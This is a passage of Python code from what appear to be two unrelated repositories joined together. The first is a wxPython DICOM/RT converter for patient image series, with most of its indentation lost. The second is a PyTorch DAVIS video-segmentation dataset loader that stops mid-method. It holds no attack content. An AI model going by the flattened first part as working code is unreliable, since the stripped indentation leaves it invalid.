if (dp.ds.SamplesPerPixel > 1) or (dp.ds.PhotometricInterpretation == 'RGB'):
logger.info('Cannot handle color image!')
return
if dp.ds.BitsAllocated == 16:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])]).astype(np.int16)
elif dp.ds.BitsAllocated == 32:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])]).astype(np.int32)
elif dp.ds.BitsAllocated == 8:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])]).astype(np.int8)
else:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])])
pos = []
for i, img in enumerate(patient_data['images']):
dp = dicomparser.DicomParser(img)
intercept, slope = dp.GetRescaleInterceptSlope()
pos.append(dp.ds.ImagePositionPatient[2])
pixel_array = dp.ds.pixel_array
rescaled_image = pixel_array * slope + intercept + self.offset
image_array[:,:,i] = rescaled_image
wx.CallAfter(progressFunc, (i+image_array.shape[-1])//2, image_array.shape[-1]+1, 'Creating image array...')
image_array = np.transpose(image_array, (1,0,2))
if self.export_mori_format:
from utils_cw import write_mori, get_mori_header_fields
logger.info('Exporting image to %s', mori_fname)
header_name = write_mori(image_array, reso, mori_fname, True)
with open(header_name, 'r') as f:
origin_header_lines = f.read().splitlines()
with open(header_name, 'w') as f:
for field in origin_header_lines: # \r\n
if 'Thickness' in field:
f.write('{} {:.6f}\r'.format(field,reso[2]))
elif 'ImagePositionBegin' in field:
f.write('{} {:.6f}\r'.format(field,np.min(pos)))
elif 'ImagePositionEnd' in field:
f.write('{} {:.6f}\r'.format(field,np.max(pos)))
elif 'Hospital' in field:
f.write('{} {}\r'.format(field,hospital))
elif 'KVP' in field:
f.write('{} {}\r'.format(field,kvp))
elif 'KernelFunction' in field:
f.write('{} {}\r'.format(field,conv_kernel))
elif 'ModelName' in field:
f.write('{} {}\r'.format(field,model_name))
elif 'PatientPosition' in field:
f.write('{} {}\r'.format(field,pat_pos))
elif 'PatientOrientation' in field:
f.write('{} {}\r'.format(field,pat_ori))
elif 'ImageOrientation' in field:
f.write('{} {}\r'.format(field,img_ori.tolist()))
elif 'StudyDate' in field:
f.write('{} {}\r'.format(field,study_date))
elif 'SeriesDate' in field:
f.write('{} {}\r'.format(field,serise_date))
elif 'AcquisitionDate' in field:
f.write('{} {}\r'.format(field,acq_date))
elif 'Orientation' in field:
f.write('{} {}\r'.format(field,'LPF'))
elif '' == field:
pass
else:
f.write('{} \r'.format(field))
wx.CallAfter(progressFunc, 97, 100, 'Export RAW image completed')
if self.export_nii_format:
import nibabel as nib
logger.info('Exporting image to %s', nii_fname)
nib.save(nib.Nifti1Image(image_array, affine=affine), nii_fname)
wx.CallAfter(progressFunc, 98, 100, 'Export Nifti image completed')
def OnConvert(self, evt):
if not self.selected_exports:
self.AlertDialog('No Dicom series have been selected!')
return
if not self.output_dir:
self.AlertDialog('Please enter valid output dir!')
return
if not self.output_name:
self.AlertDialog('Please enter valid output file name!')
return
if not os.path.isdir(self.output_dir):
logger.info("Output dir not exists! Create new dir [%s]", self.output_dir)
os.makedirs(self.output_dir)
all_export_threads = []
for export in self.selected_exports:
info = self.tcPatients.GetItemData(export)
filearray, series_no = info['filearray'], info['info']['series_number']
basename = os.path.join(self.output_dir, self.output_name+'-'+str(series_no)+'.512')
all_export_threads.append(threading.Thread(target=self.ExportPatientData,
args=(self.path, filearray, self.txtRxDose.GetValue(),
self.SetThreadStatus, self.OnUpdateProgress,
functools.partial(self.ExportFunc, out_basepath=basename))))
[th.start() for th in all_export_threads]
#[th.join() for th in all_export_threads] # wait all threads
#self.AlertDialog('All exports finished!')
def OnCheckSearchSubfolders(self, evt):
"""Determine whether to search subfolders for DICOM data."""
self.import_search_subfolders = evt.IsChecked()
self.terminate = True
self.OnDirectorySearch()
def OnBrowseDicomImport(self, evt):
"""Get the directory selected by the user."""
self.terminate = True
dlg = wx.DirDialog(
self, defaultPath = self.path,
message="Choose a directory containing DICOM RT files...")
if dlg.ShowModal() == wx.ID_OK:
self.path = dlg.GetPath()
self.txtDicomImport.SetValue(self.path)
dlg.Destroy()
#self.OnDirectorySearch()
def OnDirectorySearch(self):
"""Begin directory search."""
self.patients = {}
self.tcPatients.DeleteChildren(self.root)
self.terminate = False
self.gaugeProgress.Show(True)
self.lblProgressPercent.Show(True)
self.lblProgressPercentSym.Show(True)
#self.btnSelect.Enable(False)
# Disable Rx dose controls except on GTK due to control placement oddities
if not guiutil.IsGtk():
self.EnableRxDose(False)
# If a previous search thread exists, block until it is done before
# starting a new thread
if (hasattr(self, 't')):
self.t.join()
del self.t
self.t=threading.Thread(target=self.DirectorySearchThread,
args=(self, self.path, self.import_search_subfolders,
self.SetThreadStatus, self.OnUpdateProgress,
self.AddPatientTree, self.AddPatientDataTree))
self.t.start()
def SetThreadStatus(self):
"""Tell the directory search thread whether to terminate or not."""
return self.terminate
def DirectorySearchThread(self, parent, path, subfolders, terminate,
progressFunc, foundFunc, resultFunc):
"""Thread to start the directory search."""
# Call the progress function to update the gui
wx.CallAfter(progressFunc, 0, 0, 'Searching for patients...')
patients = {}
# Check if the path is valid
if os.path.isdir(path):
files = []
for root, dirs, filenames in os.walk(path):
files += map(lambda f:os.path.join(root, f), filenames)
if (self.import_search_subfolders == False):
break
for n in range(len(files)):
# terminate the thread if the value has changed
# during the loop duration
if terminate():
wx.CallAfter(progressFunc, 0, 0, 'Search terminated.')
return
if (os.path.isfile(files[n])):
try:
logger.debug("Reading: %s", files[n])
dp = dicomparser.DicomParser(files[n])
except (AttributeError, EOFError, IOError, KeyError):
    logger.info("%s is not a valid DICOM file.", files[n])
else:
patient = dp.GetDemographics()
h = hashlib.sha1(patient['id'].encode('utf-8')).hexdigest()
if not h in patients:
patients[h] = {}
patients[h]['demographics'] = patient
if not 'studies' in patients[h]:
patients[h]['studies'] = {}
patients[h]['series'] = {}
wx.CallAfter(foundFunc, patient)
# Create each Study but don't create one for RT Dose
# since some vendors use incorrect StudyInstanceUIDs
if not (dp.GetSOPClassUID() == 'rtdose'):
stinfo = dp.GetStudyInfo()
if not stinfo['id'] in patients[h]['studies']:
patients[h]['studies'][stinfo['id']] = stinfo
# Create each Series of images
if (('ImageOrientationPatient' in dp.ds) and \
not (dp.GetSOPClassUID() == 'rtdose')):
seinfo = dp.GetSeriesInfo()
try:
seinfo['series_number'] = dp.ds.SeriesNumber #added by CL.Wang
seinfo['KVP'] = dp.ds.KVP
seinfo['PatientPosition'] = dp.ds.PatientPosition
seinfo['ModelName'] = dp.ds.ManufacturerModelName
seinfo['PixelSpacing'] = dp.ds.PixelSpacing
seinfo['Orientation'] = dp.ds.ImageOrientationPatient
except:
logger.error('Get dcm info error!')
seinfo['numimages'] = 0
seinfo['modality'] = dp.ds.SOPClassUID.name
if not seinfo['id'] in patients[h]['series']:
patients[h]['series'][seinfo['id']] = seinfo
if not 'images' in patients[h]:
patients[h]['images'] = {}
image = {}
image['id'] = dp.GetSOPInstanceUID()
image['filename'] = files[n]
image['series'] = seinfo['id']
image['referenceframe'] = dp.GetFrameOfReferenceUID()
patients[h]['series'][seinfo['id']]['numimages'] = \
patients[h]['series'][seinfo['id']]['numimages'] + 1
patients[h]['images'][image['id']] = image
# Create each RT Structure Set
elif dp.ds.Modality in ['RTSTRUCT']:
if not 'structures' in patients[h]:
patients[h]['structures'] = {}
structure = dp.GetStructureInfo()
structure['id'] = dp.GetSOPInstanceUID()
structure['filename'] = files[n]
structure['series'] = dp.GetReferencedSeries()
structure['referenceframe'] = dp.GetFrameOfReferenceUID()
patients[h]['structures'][structure['id']] = structure
# Create each RT Plan
elif dp.ds.Modality in ['RTPLAN']:
if not 'plans' in patients[h]:
patients[h]['plans'] = {}
plan = dp.GetPlan()
plan['id'] = dp.GetSOPInstanceUID()
plan['filename'] = files[n]
plan['series'] = dp.ds.SeriesInstanceUID
plan['referenceframe'] = dp.GetFrameOfReferenceUID()
plan['beams'] = dp.GetReferencedBeamsInFraction()
plan['rtss'] = dp.GetReferencedStructureSet()
patients[h]['plans'][plan['id']] = plan
# Create each RT Dose
elif dp.ds.Modality in ['RTDOSE']:
if not 'doses' in patients[h]:
patients[h]['doses'] = {}
dose = {}
dose['id'] = dp.GetSOPInstanceUID()
dose['filename'] = files[n]
dose['referenceframe'] = dp.GetFrameOfReferenceUID()
dose['hasdvh'] = dp.HasDVHs()
dose['hasgrid'] = "PixelData" in dp.ds
dose['summationtype'] = dp.ds.DoseSummationType
dose['beam'] = dp.GetReferencedBeamNumber()
dose['rtss'] = dp.GetReferencedStructureSet()
dose['rtplan'] = dp.GetReferencedRTPlan()
patients[h]['doses'][dose['id']] = dose
# Otherwise it is a currently unsupported file
else:
logger.info("%s is a %s file and is not " + \
"currently supported.",
files[n], dp.ds.SOPClassUID.name)
# Call the progress function to update the gui
wx.CallAfter(progressFunc, n, len(files), 'Searching for patients...')
if (len(patients) == 0):
progressStr = 'Found 0 patients.'
elif (len(patients) == 1):
progressStr = 'Found 1 patient. Reading DICOM data...'
elif (len(patients) > 1):
progressStr = 'Found ' + str(len(patients)) + ' patients. Reading DICOM data...'
wx.CallAfter(progressFunc, 0, 1, progressStr)
wx.CallAfter(resultFunc, patients)
# if the path is not valid, display an error message
else:
wx.CallAfter(progressFunc, 0, 0, 'Select a valid location.')
dlg = wx.MessageDialog(
parent,
"The DICOM import location does not exist. Please select a valid location.",
"Invalid DICOM Import Location", wx.OK|wx.ICON_ERROR)
dlg.ShowModal()
def OnUpdateProgress(self, num, length, message):
"""Update the DICOM Import process interface elements."""
if not length:
percentDone = 0
else:
percentDone = int(100 * (num+1) / length)
self.gaugeProgress.SetValue(percentDone)
self.lblProgressPercent.SetLabel(str(percentDone))
self.lblProgress.SetLabel(message)
if not (percentDone == 100):
self.gaugeProgress.Show(True)
self.lblProgressPercent.Show(True)
self.lblProgressPercentSym.Show(True)
else:
self.gaugeProgress.Show(False)
self.lblProgressPercent.Show(False)
self.lblProgressPercentSym.Show(False)
# End the dialog since we are done with the import process
if (message == 'Importing patient complete.'):
self.EndModal(wx.ID_OK)
elif (message == 'Importing patient cancelled.'):
self.EndModal(wx.ID_CANCEL)
def InitTree(self):
"""Initialize the tree control for use."""
iSize = (16,16)
iList = wx.ImageList(iSize[0], iSize[1])
iList.Add(
wx.Bitmap(
util.GetResourcePath('group.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('user.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('book.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('table_multiple.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('pencil.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_bar.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_curve.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('pencil_error.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_bar_error.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_curve_error.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('table_selected.png'),
wx.BITMAP_TYPE_PNG))
self.tcPatients.AssignImageList(iList)
root = self.tcPatients.AddRoot('Patients', image=0)
return root
def AddPatientTree(self, patient):
"""Add a new patient to the tree control."""
# Create a hash for each patient
h = hashlib.sha1(patient['id'].encode('utf-8')).hexdigest()
# Add the patient to the tree if they don't already exist
if not h in self.patients:
self.patients[h] = {}
self.patients[h]['demographics'] = patient
name = str(patient['name']) + ' (' + patient['id'] + ')'
self.patients[h]['treeid'] = \
self.tcPatients.AppendItem(self.root, name, 1)
self.tcPatients.SortChildren(self.root)
self.tcPatients.ExpandAll()
def AddPatientDataTree(self, patients):
"""Add the patient data to the tree control."""
# Now add the specific item to the tree
for key, patient in self.patients.items():
patient.update(patients[key])
if 'studies' in patient:
for studyid, study in patient['studies'].items():
name = 'Study: ' + study['description']
study['treeid'] = self.tcPatients.AppendItem(patient['treeid'], name, 2)
# Search for series and images
if 'series' in patient:
for seriesid, series in patient['series'].items():
if 'studies' in patient:
for studyid, study in patient['studies'].items():
if (studyid == series['study']):
modality = series['modality'].partition(' Image Storage')[0]
name = 'Series {}: {}. ({}, {} {})'.format(series['series_number'], series['description'], modality, series['numimages'], 'image' if series['numimages']==1 else 'images')
#name = 'Series: ' + series['description'] + ' (' + modality + ', '
#numimages = str(series['numimages']) + ' image)' if (series['numimages'] == 1) else str(series['numimages']) + ' images)'
#name = name + numimages
series['treeid'] = self.tcPatients.AppendItem(study['treeid'], name, 3)
self.EnableItemSelection(patient, series, [])
# Search for RT Structure Sets
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
if 'series' in patient:
foundseries = False
name = 'RT Structure Set: ' + structure['label']
for seriesid, series in patient['series'].items():
foundseries = False
if (seriesid == structure['series']):
structure['treeid'] = self.tcPatients.AppendItem(series['treeid'], name, 4)
foundseries = True
# If no series were found, add the rtss to the study
if not foundseries:
structure['treeid'] = self.tcPatients.AppendItem(study['treeid'], name, 4)
filearray = [structure['filename']]
self.EnableItemSelection(patient, structure, filearray)
# Search for RT Plans
if 'plans' in patient:
for planid, plan in patient['plans'].items():
foundstructure = False
planname = ' (' + plan['name'] + ')' if len(plan['name']) else ""
rxdose = plan['rxdose'] if plan['rxdose'] > 0 else "Unknown"
name = 'RT Plan: ' + plan['label'] + planname + \
' - Dose: ' + str(rxdose) + ' cGy'
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
foundstructure = False
if (structureid == plan['rtss']):
plan['treeid'] = self.tcPatients.AppendItem(structure['treeid'], name, 5)
foundstructure = True
# If no structures were found, add the plan to the study/series instead
if not foundstructure:
# If there is an image series, add a fake rtss to it
foundseries = False
for seriesid, series in patient['series'].items():
foundseries = False
if (series['referenceframe'] == plan['referenceframe']):
badstructure = self.tcPatients.AppendItem(
series['treeid'], "RT Structure Set not found", 7)
foundseries = True
# If no series were found, add the rtss to the study
if not foundseries:
badstructure = self.tcPatients.AppendItem(
patient['treeid'], "RT Structure Set not found", 7)
plan['treeid'] = self.tcPatients.AppendItem(badstructure, name, 5)
self.tcPatients.SetItemTextColour(badstructure, wx.RED)
filearray = [plan['filename']]
self.EnableItemSelection(patient, plan, filearray, plan['rxdose'])
# Search for RT Doses
if 'doses' in patient:
for doseid, dose in patient['doses'].items():
foundplan = False
if 'plans' in patient:
for planid, plan in patient['plans'].items():
foundplan = False
if (planid == dose['rtplan']):
foundplan = True
rxdose = None
if dose['hasgrid']:
if dose['hasdvh']:
name = 'RT Dose with DVH'
else:
name = 'RT Dose without DVH'
else:
if dose['hasdvh']:
name = 'RT Dose without Dose Grid (DVH only)'
else:
name = 'RT Dose without Dose Grid or DVH'
if (dose['summationtype'] == "BEAM"):
name += " (Beam " + str(dose['beam']) + ": "
if dose['beam'] in plan['beams']:
b = plan['beams'][dose['beam']]
name += b['name']
if len(b['description']):
name += " - " + b['description']
name += ")"
if "dose" in b:
name += " - Dose: " + str(int(b['dose'])) + " cGy"
rxdose = int(b['dose'])
dose['treeid'] = self.tcPatients.AppendItem(plan['treeid'], name, 6)
filearray = [dose['filename']]
self.EnableItemSelection(patient, dose, filearray, rxdose)
# If no plans were found, add the dose to the structure/study instead
if not foundplan:
if dose['hasgrid']:
if dose['hasdvh']:
name = 'RT Dose with DVH'
else:
name = 'RT Dose without DVH'
else:
if dose['hasdvh']:
name = 'RT Dose without Dose Grid (DVH only)'
else:
name = 'RT Dose without Dose Grid or DVH'
foundstructure = False
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
foundstructure = False
if 'rtss' in dose:
if (structureid == dose['rtss']):
foundstructure = True
if (structure['referenceframe'] == dose['referenceframe']):
foundstructure = True
if foundstructure:
badplan = self.tcPatients.AppendItem(
structure['treeid'], "RT Plan not found", 8)
dose['treeid'] = self.tcPatients.AppendItem(badplan, name, 6)
self.tcPatients.SetItemTextColour(badplan, wx.RED)
filearray = [dose['filename']]
self.EnableItemSelection(patient, dose, filearray)
if not foundstructure:
# If there is an image series, add a fake rtss to it
foundseries = False
for seriesid, series in patient['series'].items():
foundseries = False
if (series['referenceframe'] == dose['referenceframe']):
badstructure = self.tcPatients.AppendItem(
series['treeid'], "RT Structure Set not found", 7)
foundseries = True
# If no series were found, add the rtss to the study
if not foundseries:
badstructure = self.tcPatients.AppendItem(
patient['treeid'], "RT Structure Set not found", 7)
self.tcPatients.SetItemTextColour(badstructure, wx.RED)
badplan = self.tcPatients.AppendItem(
badstructure, "RT Plan not found", 8)
dose['treeid'] = self.tcPatients.AppendItem(badplan, name, 5)
self.tcPatients.SetItemTextColour(badplan, wx.RED)
filearray = [dose['filename']]
self.EnableItemSelection(patient, dose, filearray)
# No RT Dose files were found
else:
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
if 'plans' in patient:
for planid, plan in patient['plans'].items():
name = 'RT Dose not found'
baddose = self.tcPatients.AppendItem(plan['treeid'], name, 9)
self.tcPatients.SetItemTextColour(baddose, wx.RED)
# No RT Plan nor RT Dose files were found
else:
name = 'RT Plan not found'
badplan = self.tcPatients.AppendItem(structure['treeid'], name, 8)
self.tcPatients.SetItemTextColour(badplan, wx.RED)
name = 'RT Dose not found'
baddose = self.tcPatients.AppendItem(badplan, name, 9)
self.tcPatients.SetItemTextColour(baddose, wx.RED)
#self.btnSelect.SetFocus()
self.tcPatients.ExpandAll()
self.lblProgress.SetLabel(
str(self.lblProgress.GetLabel()).replace(' Reading DICOM data...', ''))
#Added by CL.Wang
self.Check_Export_Files()
def Check_Export_Files(self):
def select(child, flag):
if flag:
self.tcPatients.SetItemImage(child, 10)
self.selected_exports.append(child)
else:
self.tcPatients.SetItemImage(child, 3)
def minslice_check(child):
info = self.tcPatients.GetItemData(child)['info']
return int(info['numimages'])>self.min_slice_num
self.selected_exports = []
first_patient = self.tcPatients.GetFirstChild(self.tcPatients.RootItem)[0]
first_study = self.tcPatients.GetFirstChild(first_patient)[0]
child, cookie = self.tcPatients.GetFirstChild(first_study)
while child.IsOk():
if self.only_export_voldata:
title = self.tcPatients.GetItemText(child)
flag = 'vol' in title.lower() and minslice_check(child)
select(child, flag)
else:
select(child, minslice_check(child))
child, cookie = self.tcPatients.GetNextChild(child, cookie)
logger.info('%d files selected!', len(self.selected_exports))
def EnableItemSelection(self, patient, item, filearray = [], rxdose = None):
"""Enable an item to be selected in the tree control."""
# Add the respective images to the filearray if they exist
if 'images' in patient:
for imageid, image in patient['images'].items():
appendImage = False
# used for image series
if 'id' in item:
if (item['id'] == image['series']):
appendImage = True
# used for RT structure set
if 'series' in item:
if (item['series'] == image['series']):
appendImage = True
# used for RT plan / dose
if 'referenceframe' in item:
if (item['referenceframe'] == image['referenceframe']):
if not 'numimages' in item:
appendImage = True
if appendImage:
filearray.append(image['filename'])
# Add the respective rtss files to the filearray if they exist
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
if 'rtss' in item:
if (structureid == item['rtss']):
filearray.append(structure['filename'])
break
elif (structure['referenceframe'] == item['referenceframe']):
filearray.append(structure['filename'])
break
# If no referenced rtss, but ref'd rtplan, check rtplan->rtss
if 'rtplan' in item:
if 'plans' in patient:
for planid, plan in patient['plans'].items():
if (planid == item['rtplan']):
if 'rtss' in plan:
if (structureid == plan['rtss']):
filearray.append(structure['filename'])
# Add the respective rtplan files to the filearray if they exist
if 'plans' in patient:
for planid, plan in patient['plans'].items():
if 'rtplan' in item:
if (planid == item['rtplan']):
filearray.append(plan['filename'])
if not rxdose:
self.tcPatients.SetItemData(item['treeid'], {'filearray':filearray, 'info':item})
else:
self.tcPatients.SetItemData(item['treeid'], {'filearray':filearray, 'info':item, 'rxdose':rxdose})
self.tcPatients.SetItemBold(item['treeid'], True)
self.tcPatients.SelectItem(item['treeid'])
def OnSelectTreeItem(self, evt):
"""Update the interface when the selected item has changed."""
item = evt.GetItem()
# Disable the rx dose message and select button by default
self.EnableRxDose(False)
#self.btnSelect.Enable(False)
# If the item has data, check to see whether there is an rxdose
if not (self.tcPatients.GetItemData(item) == None):
data = self.tcPatients.GetItemData(item)
#self.btnSelect.Enable()
rxdose = 0
parent = self.tcPatients.GetItemParent(item)
if 'rxdose' in data:
rxdose = data['rxdose']
else:
parentdata = self.tcPatients.GetItemData(parent)
if not (parentdata == None):
if 'rxdose' in parentdata:
rxdose = parentdata['rxdose']
# Show the rxdose text box if no rxdose was found
# and if it is an RT plan or RT dose file
self.txtRxDose.SetValue(rxdose)
if (self.tcPatients.GetItemText(item).startswith('RT Plan') or
self.tcPatients.GetItemText(parent).startswith('RT Plan')):
self.EnableRxDose(True)
def EnableRxDose(self, value):
"""Show or hide the prescription dose message."""
self.bmpRxDose.Show(value)
self.lblRxDose.Show(value)
self.txtRxDose.Show(value)
self.lblRxDoseUnits.Show(value)
# if set to hide, reset the rx dose
if not value:
self.txtRxDose.SetValue(1)
def ExportPatientData(self, path, filearray, RxDose, terminate, progressFunc, exportFunc):
"""Get the data of the selected patient from the DICOM importer dialog."""
msgs = ['Scanning patient. Please wait...','Exporting patient cancelled.','Exporting patient...']
wx.CallAfter(progressFunc, -1, 100, msgs[0])
for n in range(0, len(filearray)):
if terminate():
wx.CallAfter(progressFunc, 98, 100, msgs[1])
return
dcmfile = str(os.path.join(self.path, filearray[n]))
dp = dicomparser.DicomParser(dcmfile)
if (n == 0):
patient = {}
patient['rxdose'] = RxDose
if (('ImageOrientationPatient' in dp.ds) and \
not (dp.GetSOPClassUID() == 'rtdose')):
if not 'images' in patient:
patient['images'] = []
patient['images'].append(dp.ds)
elif (dp.ds.Modality in ['RTSTRUCT']):
patient['rtss'] = dp.ds
elif (dp.ds.Modality in ['RTPLAN']):
patient['rtplan'] = dp.ds
elif (dp.ds.Modality in ['RTDOSE']):
patient['rtdose'] = dp.ds
wx.CallAfter(progressFunc, n//2, len(filearray), msgs[0])
# Sort the images based on a sort descriptor:
# (ImagePositionPatient, InstanceNumber or AcquisitionNumber)
if 'images' in patient:
sortedimages = []
unsortednums = []
sortednums = []
images = patient['images']
sort = 'IPP'
# Determine if all images in the series are parallel
# by testing for differences in ImageOrientationPatient
parallel = True
for i, item in enumerate(images):
if (i > 0):
iop0 = np.array(item.ImageOrientationPatient)
iop1 = np.array(images[i-1].ImageOrientationPatient)
if (np.any(np.array(np.round(iop0 - iop1), dtype=np.int32))):
parallel = False
break
# Also test ImagePositionPatient, as some series
# use the same patient position for every slice
ipp0 = np.array(item.ImagePositionPatient)
ipp1 = np.array(images[i-1].ImagePositionPatient)
if not (np.any(np.array(np.round(ipp0 - ipp1), dtype=np.int32))):
parallel = False
break
# If the images are parallel, sort by ImagePositionPatient
if parallel:
sort = 'IPP'
else:
# Otherwise sort by Instance Number
if not (images[0].InstanceNumber == \
images[1].InstanceNumber):
sort = 'InstanceNumber'
# Otherwise sort by Acquisition Number
elif not (images[0].AcquisitionNumber == \
images[1].AcquisitionNumber):
sort = 'AcquisitionNumber'
# Add the sort descriptor to a list to be sorted
for i, image in enumerate(images):
if (sort == 'IPP'):
unsortednums.append(image.ImagePositionPatient[2])
else:
unsortednums.append(image.data_element(sort).value)
# Sort in LPI order! Modified by CL.Wang
# Sort image numbers in descending order for head first patients
if ('hf' in image.PatientPosition.lower()) and (sort == 'IPP'):
sortednums = sorted(unsortednums, reverse=True)
# Otherwise sort image numbers in ascending order
else:
sortednums = sorted(unsortednums, reverse=False)
# Add the images to the array based on the sorted order
for s, slice_val in enumerate(sortednums):
    for i, image in enumerate(images):
        if (sort == 'IPP'):
            if (slice_val == image.ImagePositionPatient[2]):
                sortedimages.append(image)
        elif (slice_val == image.data_element(sort).value):
            sortedimages.append(image)
# Save the images back to the patient dictionary
logger.debug('Slices num: %d', len(sortedimages))
patient['images'] = sortedimages
wx.CallAfter(progressFunc, 49, 100, msgs[2])
if exportFunc:
exportFunc(patient_data=patient, progressFunc=progressFunc)
wx.CallAfter(progressFunc, 99, 100, '')
def GetPatient(self):
"""Return the patient data from the DICOM importer dialog."""
return self.patient
def OnCancel(self, evt):
"""Stop the directory search and close the dialog."""
self.terminate = True
super().OnCancel(evt)
def main():
app = DcmConverterApp(0)
app.MainLoop()
if __name__ == '__main__':
main()
| 2.390625 | 2 |
datasets/davis.py | sallymmx/TransVOS | 20 | 12797966 |
import os
import numpy as np
from glob import glob
import random
import torch
from torch.utils import data
import torchvision.transforms as TF
import datasets.transform as mytrans
from utils.system import load_image_in_PIL, gct
import matplotlib.pyplot as plt
from PIL import Image
from datasets.data_utils import multibatch_collate_fn, convert_one_hot
class DAVIS_Train(data.Dataset):
r'''
- root: data root path, str
- output_size: output size of image and mask, tuple
    - imset: image set list file under ImageSets (e.g. '2017/train.txt'), str
- clip_n: number of video clip for training, int
- max_obj_n: maximum number of objects in a image for training, int
'''
MAX_TRAINING_SKIP = 100
def __init__(self, root, output_size, imset='2017/train.txt', clip_n=3, max_obj_n=7,
max_skip=5, increment=5, samples=2, choice='order', crop=False):
self.root = root
self.clip_n = clip_n
self.output_size = output_size
self.max_obj_n = max_obj_n
self.max_skip = max_skip
self.increment = increment
        self.samples = samples
self.sample_choice = choice
self.crop = crop
dataset_path = os.path.join(root, 'ImageSets', imset)
self.dataset_list = list()
with open(os.path.join(dataset_path), 'r') as lines:
for line in lines:
dataset_name = line.strip()
if len(dataset_name) > 0:
self.dataset_list.append(dataset_name)
print(f'\t"DAVIS17": {len(self.dataset_list)} videos.')
self.random_horizontal_flip = mytrans.RandomHorizontalFlip(0.3)
self.color_jitter = TF.ColorJitter(0.1, 0.1, 0.1, 0.02)
self.random_affine = mytrans.RandomAffine(degrees=15, translate=(0.1, 0.1), scale=(0.95, 1.05), shear=10)
if self.crop:
self.random_resize_crop = mytrans.RandomResizedCrop(400, (0.8, 1), (0.95, 1.05))
else:
self.resize = mytrans.Resize(output_size)
self.to_tensor = TF.ToTensor()
self.normalize = TF.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
self.to_onehot = mytrans.ToOnehot(max_obj_n, shuffle=True)
def increase_max_skip(self):
self.max_skip = min(self.max_skip + self.increment, self.MAX_TRAINING_SKIP)
def set_max_skip(self, max_skip):
self.max_skip = max_skip
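    # Hedged usage sketch: a training loop can widen the temporal sampling
    # window gradually (a curriculum over frame gaps). `epochs_per_increment`
    # below is illustrative only and not part of this file:
    #
    #     if (epoch + 1) % epochs_per_increment == 0:
    #         train_set.increase_max_skip()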
def __len__(self):
        return len(self.dataset_list) * self.samples
def __getitem__(self, idx):
        video_name = self.dataset_list[idx // self.samples]
img_dir = os.path.join(self.root, 'JPEGImages', '480p', video_name)
mask_dir = os.path.join(self.root, 'Annotations', '480p', video_name)
img_list = sorted(glob(os.path.join(img_dir, '*.jpg')))
mask_list = sorted(glob(os.path.join(mask_dir, '*.png')))
img_n = len(img_list)
obj_n = 1
while obj_n == 1:
if self.sample_choice == 'order':
idx_list = list()
last_sample = -1
sample_n = min(self.clip_n, img_n)
for i in range(sample_n):
if i == 0:
last_sample = random.choice(range(0, img_n-sample_n+1))
else:
last_sample = random.choice(
range(last_sample+1, min(last_sample+self.max_skip+1, img_n-sample_n+i+1)))
idx_list.append(last_sample)
elif self.sample_choice == 'random':
idx_list = list(range(img_n))
random.shuffle(idx_list)
sample_n = min(self.clip_n, img_n)
idx_list = idx_list[:sample_n]
else:
raise NotImplementedError()
while len(idx_list) < self.clip_n: # short video
idx_list.append(idx_list[-1])
if not self.crop:
frames = torch.zeros((self.clip_n, 3, *self.output_size), dtype=torch.float)
masks = torch.zeros((self.clip_n, self.max_obj_n, *self.output_size), dtype=torch.float)
else:
frames = torch.zeros((self.clip_n, 3, 400, 400), dtype=torch.float)
masks = torch.zeros((self.clip_n, self.max_obj_n, 400, 400), dtype=torch.float)
for i, frame_idx in enumerate(idx_list):
img = load_image_in_PIL(img_list[frame_idx], 'RGB')
mask = load_image_in_PIL(mask_list[frame_idx], 'P')
if i > 0:
img = self.color_jitter(img)
img, mask = self.random_affine(img, mask)
if self.crop:
img, mask = self.random_resize_crop(img, mask)
else:
img, mask = self.resize(img, mask)
mask = np.array(mask, np.uint8)
if i == 0:
mask, obj_list = self.to_onehot(mask)
obj_n = len(obj_list) + 1
else:
mask, _ = self.to_onehot(mask, obj_list)
frames[i] = self.normalize(self.to_tensor(img))
masks[i] = mask
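        # (Hedged shape summary) frames: (clip_n, 3, H, W) normalized RGB;
        # masks: (clip_n, max_obj_n, H, W) one-hot; obj_n counts objects plus background.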
info = {
'name': video_name,
'idx_list': idx_list
}
return frames, masks, obj_n, info
class DAVIS_Test(data.Dataset):
r'''
- root: data root path, str
- output_size: output size of image and mask, tuple
    - imset: image set list file under ImageSets (e.g. '2017/val.txt'), str
- max_obj_n: maximum number of objects in a image for training, int
'''
def __init__(self, root, output_size=None, img_set='2017/val.txt', max_obj_n=11, single_obj=False):
self.root = root
self.single_obj = single_obj
dataset_path = os.path.join(root, 'ImageSets', img_set)
self.dataset_list = list()
self.output_size = output_size
with open(os.path.join(dataset_path), 'r') as lines:
for line in lines:
dataset_name = line.strip()
if len(dataset_name) > 0:
self.dataset_list.append(dataset_name)
self.to_tensor = TF.ToTensor()
self.normalize = TF.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
self.to_onehot = mytrans.ToOnehot(max_obj_n, shuffle=False)
def __len__(self):
return len(self.dataset_list)
def __getitem__(self, idx):
